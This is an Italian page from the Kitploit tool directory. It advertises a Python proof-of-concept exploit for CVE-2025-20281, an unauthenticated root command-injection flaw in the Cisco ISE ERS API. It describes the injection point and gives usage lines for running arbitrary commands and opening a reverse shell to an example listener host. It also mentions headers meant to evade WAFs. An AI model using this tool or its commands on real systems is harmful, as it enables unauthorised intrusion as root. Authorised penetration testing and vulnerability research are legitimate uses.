Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Cisco-CVE-2025-20281-illdeed — Exploit di esecuzione di codice remoto non autenticato per CVE-2025-20281 nell'API ERS di Cisco ISE. Esegui comandi o avvia reverse shell come root — nessuna autenticazione richiesta. | Kitploit
Strumenti/GitHubGitHub/ill-deed/cisco-cve-2025-20281-illdeed
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubill-deed/cisco-cve-2025-20281-illdeed

Cisco-CVE-2025-20281-illdeed

Exploit di esecuzione di codice remoto non autenticato per CVE-2025-20281 nell'API ERS di Cisco ISE. Esegui comandi o avvia reverse shell come root — nessuna autenticazione richiesta.

Vedi Repository
52341 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-20281 — Exploit RCE non autenticato per Cisco ISE ERS API

Questo repository contiene un proof-of-concept in Python 3 per CVE-2025-20281, una vulnerabilità critica in Cisco Identity Services Engine (ISE) che consente esecuzione di codice remoto non autenticata (RCE) come root tramite l'API ERS.


🩻 Panoramica della vulnerabilità

L'endpoint /ers/sdk#_ di Cisco ISE ERS non convalida l'autenticazione durante l'elaborazione delle richieste di creazione utente.
Iniettando comandi shell nel parametro name dell'oggetto InternalUser, gli aggressori possono ottenere l'esecuzione di comandi come root.

  • CVE ID: CVE-2025-20281
  • Affetto: Cisco ISE PAN (Nodo di amministrazione delle policy) con ERS abilitato
  • Gravità: Critica (CVSS 9.8)
  • Autenticazione: Nessuna richiesta

⚙️ Funzionalità

  • ✅ Esegui comandi arbitrari (--cmd)
  • ✅ Test rapido con --whoami
  • ✅ Avvia reverse shell (--reverse)
  • ✅ Nessuna autenticazione o token di sessione richiesti
  • ✅ Soppressione avvisi SSL e output pulito
  • ✅ Intestazioni legittime per bypassare semplici WAF

🚀 Utilizzo

root@kitploit:~
python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]

Esempi

Test comando:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --whoami

Esegui comando personalizzato:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"

Reverse shell:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444

⚠️ Disclaimer legale

Questo codice è fornito esclusivamente a scopo educativo e di test autorizzato. Non utilizzare questo software contro reti o sistemi di cui non sei proprietario o per i quali non hai autorizzazione al test.


🙏 Crediti

Vulnerabilità: Divulgata tramite advisory Cisco

Refactoring PoC: illdeed

Scarica lo strumento